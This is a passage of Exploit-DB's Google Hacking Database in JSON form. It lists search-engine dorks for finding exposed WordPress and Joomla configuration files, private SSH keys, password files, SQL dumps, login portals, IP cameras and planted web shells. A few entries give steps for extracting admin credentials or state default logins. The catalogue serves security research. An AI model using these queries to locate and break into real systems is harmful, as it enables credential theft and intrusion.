"inurl:phpmyadmin/index.php & (intext:username & password & \"Welcome to\")", "textualDescription": "#Summary: PHP Admin login portals\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3882", "link": "https://www.exploit-db.com/ghdb/3882/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:~~joomla3.txt filetype:txt", "shortDescription": "inurl:~~joomla3.txt filetype:txt", "textualDescription": "By this dork you can find juicy information joomla configuration files\n\nAuthor: Un0wn_X" }, { "signatureReferenceNumber": "3883", "link": "https://www.exploit-db.com/ghdb/3883/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:txt inurl:wp-config.txt", "shortDescription": "filetype:txt inurl:wp-config.txt", "textualDescription": "Easily hunt the Wordpress configuration file in of remote web sites\n\nAuthor : Un0wn_X" }, { "signatureReferenceNumber": "3884", "link": "https://www.exploit-db.com/ghdb/3884/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:txt inurl:~~Wordpress2.txt", "shortDescription": "filetype:txt inurl:~~Wordpress2.txt", "textualDescription": "This dork can be used to find symlinked Wordpress configuration files of\nother web sites" }, { "signatureReferenceNumber": "3885", "link": "https://www.exploit-db.com/ghdb/3885/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=-site:simplemachines.org \"These are the paths and URLs to your SMF installation\"", "shortDescription": "-site:simplemachines.org \"These are the paths and URLs to your SMF installation\"", "textualDescription": "Dork:\n-site:simplemachines.org \"These are the paths and URLs to your SMF\ninstallation\"\n\nDetails:\nThis google dork finds sites with the Simple Machines repair_settings.php\nfile uploaded to the root directory. This gives unauthenticated access to\nthe SQL username and password for the forum." }, { "signatureReferenceNumber": "3886", "link": "https://www.exploit-db.com/ghdb/3886/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"index of\" myshare", "shortDescription": "intitle:\"index of\" myshare", "textualDescription": "Google search for shared HDD directories or shared directories on servers.\nGives access to often unconsciously shared documents, programs or\nsensitive information.\nAlso are often other directories on these drives accessible.\n\nDork by :\nredN00ws" }, { "signatureReferenceNumber": "3887", "link": "https://www.exploit-db.com/ghdb/3887/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"SPA504G Configuration\"", "shortDescription": "intitle:\"SPA504G Configuration\"", "textualDescription": "Dork : intitle:\"SPA504G Configuration\"\nResult : Gives access to Cisco SPA504G Configuration Utility for IP phones\n\nScreenshot Google Dork\nDork found by :\nredN00ws" }, { "signatureReferenceNumber": "3888", "link": "https://www.exploit-db.com/ghdb/3888/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=\"BEGIN RSA PRIVATE KEY\" filetype:key -github", "shortDescription": "\"BEGIN RSA PRIVATE KEY\" filetype:key -github", "textualDescription": "To find private RSA Private SSL Keys" }, { "signatureReferenceNumber": "3889", "link": "https://www.exploit-db.com/ghdb/3889/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"/cgi-mod/index.cgi\"", "shortDescription": "inurl:\"/cgi-mod/index.cgi\"", "textualDescription": "Returns login pages for various Barracuda Networks branded hardware spam\nfilters and mail archivers.\n\n4N6 Security" }, { "signatureReferenceNumber": "3890", "link": "https://www.exploit-db.com/ghdb/3890/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"RouterOS router configuration page\"", "shortDescription": "intitle:\"RouterOS router configuration page\"", "textualDescription": "Returns login portals for Microtik routers running RouterOS version 5\nand up.\n\n4N6 Security" }, { "signatureReferenceNumber": "3891", "link": "https://www.exploit-db.com/ghdb/3891/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"/webcm?getpage=\"", "shortDescription": "inurl:\"/webcm?getpage=\"", "textualDescription": "Returns various Actiontec (and often Qwest) branded routers' login pages.\n\n4N6 Security" }, { "signatureReferenceNumber": "3892", "link": "https://www.exploit-db.com/ghdb/3892/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"Web Client for EDVS\"", "shortDescription": "intitle:\"Web Client for EDVS\"", "textualDescription": "Yet another DVR system. Probably requires Java to display.\n\n4N6 Security" }, { "signatureReferenceNumber": "3893", "link": "https://www.exploit-db.com/ghdb/3893/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:index.of intext:.ssh", "shortDescription": "intitle:index.of intext:.ssh", "textualDescription": "Find peoples ssh public and private keys\n\n- tmc / #havok" }, { "signatureReferenceNumber": "3894", "link": "https://www.exploit-db.com/ghdb/3894/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:*/graphs* intitle:\"Traffic and system resource graphing\"", "shortDescription": "inurl:*/graphs* intitle:\"Traffic and system resource graphing\"", "textualDescription": "With this search you can view results for mikrotik graphics interfaces\n\n\n*Obrigado,*" }, { "signatureReferenceNumber": "3895", "link": "https://www.exploit-db.com/ghdb/3895/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:*/webalizer/* intitle:\"Usage Statistics\"", "shortDescription": "inurl:*/webalizer/* intitle:\"Usage Statistics\"", "textualDescription": "*Obrigado,*" }, { "signatureReferenceNumber": "3896", "link": "https://www.exploit-db.com/ghdb/3896/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Comrex ACCESS Rack\"", "shortDescription": "intitle:\"Comrex ACCESS Rack\"", "textualDescription": "IP Codecs offering \"studio quality audio and video over wired and\nwireless IP circuits\". Used in studio-grade radio broadcasting over the\nweb. More product information here: http://www.comrex.com/products.html.\nThis Google search will return (some, but not hundreds of) web-facing\nlogin portals for this type of device. Requires JavaScript and Flash for\nviewer to work. Default login: comrex comrex.\n\n4N6 Security" }, { "signatureReferenceNumber": "3897", "link": "https://www.exploit-db.com/ghdb/3897/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=site%3Agithub.com+inurl%3Asftp-config.json+intext%3A%2Fwp-content%2F", "shortDescription": "site:github.com inurl:sftp-config.json intext:/wp-content/", "textualDescription": "Finds disclosed ftp FTP for Wordpress installs, which have been pushed to a public repo on GitHub.\n\nCredit: RogueCoder" }, { "signatureReferenceNumber": "3898", "link": "https://www.exploit-db.com/ghdb/3898/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=site%3Agithub.com+inurl%3Asftp-config.json", "shortDescription": "site:github.com inurl:sftp-config.json", "textualDescription": "Find disclosed FTP login credentials in github repositories\n\nCredit: RogueCoder" }, { "signatureReferenceNumber": "3899", "link": "https://www.exploit-db.com/ghdb/3899/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:github.com intext:sftp-conf.json +intext:/wp-content/", "shortDescription": "inurl:github.com intext:sftp-conf.json +intext:/wp-content/", "textualDescription": "Find FTP logins and full path disclosures pushed to github\n\ninurl:github.com intext:sftp-conf.json +intext:/wp-content/\n\n--\nRogueCoder" }, { "signatureReferenceNumber": "3900", "link": "https://www.exploit-db.com/ghdb/3900/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=allinurl:\"owa/auth/logon.aspx\" -google -github", "shortDescription": "allinurl:\"owa/auth/logon.aspx\" -google -github", "textualDescription": "[+] Description - Find OWA login portals\n\nRegards,\n\nnecrodamus\n\nhttp://www.twitter.com/necrodamus2600" }, { "signatureReferenceNumber": "3901", "link": "https://www.exploit-db.com/ghdb/3901/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:sql intext:@gmail.com intext:password", "shortDescription": "ext:sql intext:@gmail.com intext:password", "textualDescription": "author:haji" }, { "signatureReferenceNumber": "3902", "link": "https://www.exploit-db.com/ghdb/3902/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:\"struts\" filetype:action", "shortDescription": "inurl:\"struts\" filetype:action", "textualDescription": "Google search for actoin files wich could be explotable via CVE-2013-2251\n\"Multiple Remote Command Execution Vulnerabilities in Apache Struts\"" }, { "signatureReferenceNumber": "3903", "link": "https://www.exploit-db.com/ghdb/3903/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:php intext:\"PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT\"", "shortDescription": "filetype:php intext:\"PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT\"", "textualDescription": "Project Honey Pot anti-spammer detection (http://www.projecthoneypot.org/)\n\nCan identify the honeypot and get the site's honeypot keys\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3904", "link": "https://www.exploit-db.com/ghdb/3904/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:config \"fetch = +refs/heads/*:refs/remotes/origin/*\"", "shortDescription": "inurl:config \"fetch = +refs/heads/*:refs/remotes/origin/*\"", "textualDescription": "Git config file\n\nEasy way to find Git Repositories\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3905", "link": "https://www.exploit-db.com/ghdb/3905/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"IPCam Client\"", "shortDescription": "intitle:\"IPCam Client\"", "textualDescription": "Foscam IPCam\n\nBy default these cameras attach to the myfoscam.org DDNS. So you could add\nsite:myfoscam.org. On the otherhand if you're hunting for DDNS servers, you\ncould negate that site and examine the other results.\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3906", "link": "https://www.exploit-db.com/ghdb/3906/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:/wp-content/uploads/ filetype:sql", "shortDescription": "inurl:/wp-content/uploads/ filetype:sql", "textualDescription": "Google dork for WordPress database backup file (sql):\n\ninurl:/wp-content/uploads/ filetype:sql\n\nBy sm0k3 (http://sm0k3.net - Sm0k3 HQ)\n_________________\n\nWith regards,\nsm0k3\n\nAny questions: info@sm0k3.net\nAdministration issues: admin@sm0k3.net\nWant to submit an order: submit@sm0k3.net\nJabber: sm0k3@im.sm0k3.net\nBlog: http://sm0k3.net" }, { "signatureReferenceNumber": "3907", "link": "https://www.exploit-db.com/ghdb/3907/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:github.com inurl:\"known_hosts\" \"ssh-rsa\"", "shortDescription": "site:github.com inurl:\"known_hosts\" \"ssh-rsa\"", "textualDescription": "Finds SSH known_hosts files on GitHub.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3908", "link": "https://www.exploit-db.com/ghdb/3908/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:github.com inurl:\"id_rsa\" -inurl:\"pub\"", "shortDescription": "site:github.com inurl:\"id_rsa\" -inurl:\"pub\"", "textualDescription": "Finds private SSH keys on GitHub.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3909", "link": "https://www.exploit-db.com/ghdb/3909/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"/module.php/core/loginuserpass.php\"", "shortDescription": "inurl:\"/module.php/core/loginuserpass.php\"", "textualDescription": "Finds SimpleSAMLphp login pages.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3910", "link": "https://www.exploit-db.com/ghdb/3910/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"/jenkins/login\" \"Page generated\"", "shortDescription": "inurl:\"/jenkins/login\" \"Page generated\"", "textualDescription": "Finds login pages for Jenkins continuous integration servers.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3911", "link": "https://www.exploit-db.com/ghdb/3911/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=\"inurl:/data/nanoadmin.php\"", "shortDescription": "\"inurl:/data/nanoadmin.php\"", "textualDescription": "Hi,\n\nI would like to submit this GHDB which allow to find out nanoCMS\nadministration pages :\n\n\n*inurl:\"/data/nanoadmin.php\"*\n\n\nBest regards,\nAntonino Napoli" }, { "signatureReferenceNumber": "3912", "link": "https://www.exploit-db.com/ghdb/3912/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:\"uploader by ghost-dz\" ext:php", "shortDescription": "intitle:\"uploader by ghost-dz\" ext:php", "textualDescription": "intitle:\"uploader by ghost-dz\" ext:php" }, { "signatureReferenceNumber": "3913", "link": "https://www.exploit-db.com/ghdb/3913/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:bak (inurl:php | inurl:asp | inurl:rb)", "shortDescription": "filetype:bak (inurl:php | inurl:asp | inurl:rb)", "textualDescription": "This one could be used to find all sorts of backup data, but this example\nis limited to just common webapp extensions\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3914", "link": "https://www.exploit-db.com/ghdb/3914/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"index of\" intext:\".ds_store\"", "shortDescription": "intitle:\"index of\" intext:\".ds_store\"", "textualDescription": "Mac OSX directories\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3915", "link": "https://www.exploit-db.com/ghdb/3915/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:tar filetype:gz", "shortDescription": "inurl:tar filetype:gz", "textualDescription": "Tar files\nContain user and group information (in addition to potentially useful files)\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3916", "link": "https://www.exploit-db.com/ghdb/3916/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"RT at a glance\" intext:\"quick search\"", "shortDescription": "intitle:\"RT at a glance\" intext:\"quick search\"", "textualDescription": "RT Request Tracker Ticket Database\nhttp://www.bestpractical.com/rt/\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3917", "link": "https://www.exploit-db.com/ghdb/3917/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"jmx-console/HtmlAdaptor\" intitle:Mbean", "shortDescription": "inurl:\"jmx-console/HtmlAdaptor\" intitle:Mbean", "textualDescription": "JBoss\nhttp://docs.jboss.org/jbossas/docs/Server_Configuration_Guide/4/html/Connecting_to_the_JMX_Server-Inspecting_the_Server___the_JMX_Console_Web_Application.html\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3918", "link": "https://www.exploit-db.com/ghdb/3918/", "category": "Footholds", "querystring": "http://www.google.com/search?q=filetype:php intext:\"!C99Shell v. 1.0 beta\"", "shortDescription": "filetype:php intext:\"!C99Shell v. 1.0 beta\"", "textualDescription": "php backdoor: c99 shell\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3919", "link": "https://www.exploit-db.com/ghdb/3919/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:xml inurl:sitemap", "shortDescription": "filetype:xml inurl:sitemap", "textualDescription": "Sitemaps, the opposite of Web Robots Exclusion\n\nDetail directory and page map\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3920", "link": "https://www.exploit-db.com/ghdb/3920/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=filetype:jnlp", "shortDescription": "filetype:jnlp", "textualDescription": "Java Web Start (Java Network Launch Protocol)\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3921", "link": "https://www.exploit-db.com/ghdb/3921/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:password jmxremote", "shortDescription": "filetype:password jmxremote", "textualDescription": "Passwords for Java Management Extensions (JMX Remote)\nUsed by jconsole, Eclipse's MAT, Java Visual VM, JmxCli\n\nhttp://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html\n\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563" }, { "signatureReferenceNumber": "3922", "link": "https://www.exploit-db.com/ghdb/3922/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:mikrotik filetype:backup", "shortDescription": "inurl:mikrotik filetype:backup", "textualDescription": "mikrotik url backups uploaded..\n\nthen.. credentials cracked via http://mikrotikpasswordrecovery.com\n\nBest Regards,\n\nkn0wl13dg3 - underc0de team.- www.underc0de.org\n\nkn0w13dg3.blogspot.com" }, { "signatureReferenceNumber": "3923", "link": "https://www.exploit-db.com/ghdb/3923/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github", "shortDescription": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github", "textualDescription": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github\n\nHow This Work?\n\nThis dork will searches databases phpMyAdmin. Searches only sql formats and founds admin username and passwords to use this information to login as administrator\n\nSorry for my english. I'm not a native speaker" }, { "signatureReferenceNumber": "3924", "link": "https://www.exploit-db.com/ghdb/3924/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/administrator/index.php?autologin=1", "shortDescription": "inurl:/administrator/index.php?autologin=1", "textualDescription": "Title: google hacking username and password of joomla\nGoogle Dork: inurl:/administrator/index.php?autologin=1\nDate: 2013-11-30\nAuthor: Ashiyane Digital Security Team\nSoftware Link: www.joomla.org/\nVersion: joomla 2.5\nLocation: /administrator/index.php?autologin=1&passwd=[password]&username=[username]" }, { "signatureReferenceNumber": "3925", "link": "https://www.exploit-db.com/ghdb/3925/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=allinurl:\"/main/auth/profile.php\" -github -google", "shortDescription": "allinurl:\"/main/auth/profile.php\" -github -google", "textualDescription": "[+] This dork will help you find Chamilo login portals. Depending on the\nversion, the site could be vulnerable to SQL injection.\n\nSee Here-\nhttp://www.exploit-db.com/exploits/30012/\n\n\nRegards,\n\nnecrodamus\n\nhttp://www.twitter.com/necrodamus2600" }, { "signatureReferenceNumber": "3926", "link": "https://www.exploit-db.com/ghdb/3926/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:\"=[ 1n73ct10n privat shell ]=\"", "shortDescription": "intitle:\"=[ 1n73ct10n privat shell ]=\"", "textualDescription": "the dork is used to find uploaded 1n73ct10n Shell on website.\nfound by Anon?M ID" }, { "signatureReferenceNumber": "3927", "link": "https://www.exploit-db.com/ghdb/3927/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:\"WSO 2.4\" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]", "shortDescription": "intitle:\"WSO 2.4\" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]", "textualDescription": "dork to find uploaded WSO 2.4 shell by hackers.\nfound by Anon?M ID" }, { "signatureReferenceNumber": "3928", "link": "https://www.exploit-db.com/ghdb/3928/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "shortDescription": "intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "textualDescription": "Find IDS and Mod security\n\n\ndork: intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"" }, { "signatureReferenceNumber": "3929", "link": "https://www.exploit-db.com/ghdb/3929/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=allinurl:\"zimbra/?zinitmode=http\" -google -github", "shortDescription": "allinurl:\"zimbra/?zinitmode=http\" -google -github", "textualDescription": "zimbra webmail login page lookup\nallinurl:\"zimbra/?zinitmode=http\" -google -github\n\n\n-- \n-----------------------------------------------------------------\n*|JJohnny *RANDRIAMAMPIONONA |\n| Phone: (+261) 33 08 003 61 |\n| NSS Engineer | IS Security Enthusiast |\n| |----------------------------------------------------------------|" }, { "signatureReferenceNumber": "3930", "link": "https://www.exploit-db.com/ghdb/3930/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intext:\"Access denied for\" intitle:\"Shopping cart\"", "shortDescription": "intext:\"Access denied for\" intitle:\"Shopping cart\"", "textualDescription": "Here is a Dork I use in conjunction with sqlmap, for shopping carts with\nMySQL\nError messages.\nIt got 80.000 results.\n\nintext:\"Access denied for\" intitle:\"Shopping cart\"" }, { "signatureReferenceNumber": "3931", "link": "https://www.exploit-db.com/ghdb/3931/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=allinurl:/hide_my_wp=", "shortDescription": "allinurl:/hide_my_wp=", "textualDescription": "i just found a google dork that is\nfile/path disclosure of\nHide My WP plugin\n\nGoogle dork - allinurl:/hide_my_wp=\n\nit will show the plugin file folder and all file.\n\n thanks\n\nkamrul hassan arman" }, { "signatureReferenceNumber": "3932", "link": "https://www.exploit-db.com/ghdb/3932/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:\"/reports/rwservlet\" intext:\"Oracle\"", "shortDescription": "inurl:\"/reports/rwservlet\" intext:\"Oracle\"", "textualDescription": "Search Oracle Reports likely vulnerable to DB user/password disclosure\n(CVE-2012-3152\nand CVE-2012-3153)\n\n-- \nFelipe Molina" }, { "signatureReferenceNumber": "3933", "link": "https://www.exploit-db.com/ghdb/3933/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:\"pChart 2.x - examples\" intext:\"2.1.3\"", "shortDescription": "intitle:\"pChart 2.x - examples\" intext:\"2.1.3\"", "textualDescription": "The web application is vulnerable to Directory Traversal and XSS.\nThe version number can be omitted, all prior versions prior than 2.1.4\nare vulnerable.\nAdvisories and Vulnerabilities\nhttp://www.exploit-db.com/exploits/31173/\nhttp://www.pchart.net/advisory" }, { "signatureReferenceNumber": "3934", "link": "https://www.exploit-db.com/ghdb/3934/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=\"[function.getimagesize]: failed to open stream: No such file or directory in\"", "shortDescription": "\"[function.getimagesize]: failed to open stream: No such file or directory in\"", "textualDescription": "Just another error that reveals full paths" }, { "signatureReferenceNumber": "3935", "link": "https://www.exploit-db.com/ghdb/3935/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=site:bitbucket.org inurl:.bash_history", "shortDescription": "site:bitbucket.org inurl:.bash_history", "textualDescription": "Finding Sensitive data\n\nsite:bitbucket.org inurl:.bash_history\n\nBy Pharos" }, { "signatureReferenceNumber": "3936", "link": "https://www.exploit-db.com/ghdb/3936/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:Admin inurl:login.php site:.co.in", "shortDescription": "intitle:Admin inurl:login.php site:.co.in", "textualDescription": "dork submitted by M4RKM3N aka Osama Mahmood\n\nrevels admin login panels of sites :)" }, { "signatureReferenceNumber": "3937", "link": "https://www.exploit-db.com/ghdb/3937/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:crossdomain filetype:xml intext:allow-access-from", "shortDescription": "inurl:crossdomain filetype:xml intext:allow-access-from", "textualDescription": "Locates crossdomain.xml files used by flash/flex/silverlight to\ndetermine the cross domain policy of that site's\nflash/flex/silverlight apps. An open setting of will allow a weaponized flash application hosted on an\nattacker's site to read information from the target site while running\nin a victim's browser.\n\n-- \nGoogle+ http://google.com/+EricGragsone\nRed Team http://www.crimsonagents.com/\nBlue Team http://www.erisresearch.org/\nCoding http://maetrics.github.io" }, { "signatureReferenceNumber": "3938", "link": "https://www.exploit-db.com/ghdb/3938/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:clientaccesspolicy filetype:xml intext:allow-from", "shortDescription": "inurl:clientaccesspolicy filetype:xml intext:allow-from", "textualDescription": "Locates clientaccesspolicy.xml files used by silverlight to determine\nthe cross domain policy of that site's silverlight apps. An open\nsetting of will allow a weaponized silverlight\napplication hosted on an attacker's site to read information from the\ntarget site while running in a victim's browser.\n\n-- \nGoogle+ http://google.com/+EricGragsone\nRed Team http://www.crimsonagents.com/\nBlue Team http://www.erisresearch.org/\nCoding http://maetrics.github.io" }, { "signatureReferenceNumber": "3939", "link": "https://www.exploit-db.com/ghdb/3939/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:/backup intitle:index of backup intext:*sql", "shortDescription": "inurl:/backup intitle:index of backup intext:*sql", "textualDescription": "Google Search:https://www.google.com/search?client=opera&q=admin+username+and+pass&sourceid=opera&ie=UTF-8&oe=UTF-8#q=inurl:/backup+intitle:index+of+backup+intext:*sql&start=70\n1)Find the Back Up\n2)Downlod it\n3)Import it into phpmyadmin\n4)Find the admin username and password :)\n\nDork submitted by The Vi9er\nGood Luck" }, { "signatureReferenceNumber": "3940", "link": "https://www.exploit-db.com/ghdb/3940/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"Citrix/XenApp/auth/login.aspx\"", "shortDescription": "inurl:\"Citrix/XenApp/auth/login.aspx\"", "textualDescription": "Finds login portals for Citrix XenApp.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3941", "link": "https://www.exploit-db.com/ghdb/3941/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:pdf \"acunetix website audit\" \"alerts summary\"", "shortDescription": "filetype:pdf \"acunetix website audit\" \"alerts summary\"", "textualDescription": "Finds reports generated by Acunetix scans.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3942", "link": "https://www.exploit-db.com/ghdb/3942/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:typo3/install/index.php?mode=", "shortDescription": "inurl:typo3/install/index.php?mode=", "textualDescription": "typo3 install logins\n\n\nBruno Schmid" }, { "signatureReferenceNumber": "3943", "link": "https://www.exploit-db.com/ghdb/3943/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:typo3conf/localconf.php", "shortDescription": "inurl:typo3conf/localconf.php", "textualDescription": "typo3 passwords :-)\n\nBruno Schmid" }, { "signatureReferenceNumber": "3944", "link": "https://www.exploit-db.com/ghdb/3944/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Zimbra Web Client Sign In\"", "shortDescription": "intitle:\"Zimbra Web Client Sign In\"", "textualDescription": "Open Source Zimbra Webmail Login pages" }, { "signatureReferenceNumber": "3945", "link": "https://www.exploit-db.com/ghdb/3945/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Zimbra Web Client Log In\"", "shortDescription": "intitle:\"Zimbra Web Client Log In\"", "textualDescription": "Open Source Zimbra Webmail Login pages" }, { "signatureReferenceNumber": "3946", "link": "https://www.exploit-db.com/ghdb/3946/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=xamppdirpasswd.txt filetype:txt", "shortDescription": "xamppdirpasswd.txt filetype:txt", "textualDescription": "xamppdirpasswd.txt filetype:txt" }, { "signatureReferenceNumber": "3947", "link": "https://www.exploit-db.com/ghdb/3947/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl:\"/cacti/graph_view.php\" OR inurl:\"/cacti/graph.php?\"", "shortDescription": "inurl:\"/cacti/graph_view.php\" OR inurl:\"/cacti/graph.php?\"", "textualDescription": "Search the CACTI system of SNMP graphs\n\nDaniel Maldonado\nhttp://caceriadespammers.com.ar" }, { "signatureReferenceNumber": "3948", "link": "https://www.exploit-db.com/ghdb/3948/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=\"OpenSSL\" AND \"1.0.1 Server at\" OR \"1.0.1a Server at\" OR \"1.0.1b Server at\" OR \"1.0.1c Server at\" OR \"1.0.1d Server at\" OR \"1.0.1e Server at\" OR \"1.0.1f Server at\"", "shortDescription": "\"OpenSSL\" AND \"1.0.1 Server at\" OR \"1.0.1a Server at\" OR \"1.0.1b Server at\" OR \"1.0.1c Server at\" OR \"1.0.1d Server at\" OR \"1.0.1e Server at\" OR \"1.0.1f Server at\"", "textualDescription": "Search for all Apache servers that are running specific versions of\nOpenSSL. These specific versions of OpenSSL could potentially be vulnerable\nto the heartbleed attack.\n\nAhmad Al-Nounou\nhttp://www.linkedin.com/in/ahmadalnounou" }, { "signatureReferenceNumber": "3949", "link": "https://www.exploit-db.com/ghdb/3949/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"/public.php?service=files\"", "shortDescription": "inurl:\"/public.php?service=files\"", "textualDescription": "Search for shared files from ownCloud\n\nDaniel Maldonado\nhttp://caceriadespammers.com.ar" }, { "signatureReferenceNumber": "3950", "link": "https://www.exploit-db.com/ghdb/3950/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext:\"Hikvision\" inurl:\"login.asp\"", "shortDescription": "intext:\"Hikvision\" inurl:\"login.asp\"", "textualDescription": "Hikvision IP Camera login page" }, { "signatureReferenceNumber": "3951", "link": "https://www.exploit-db.com/ghdb/3951/", "category": "Various Online Devices", "querystring": 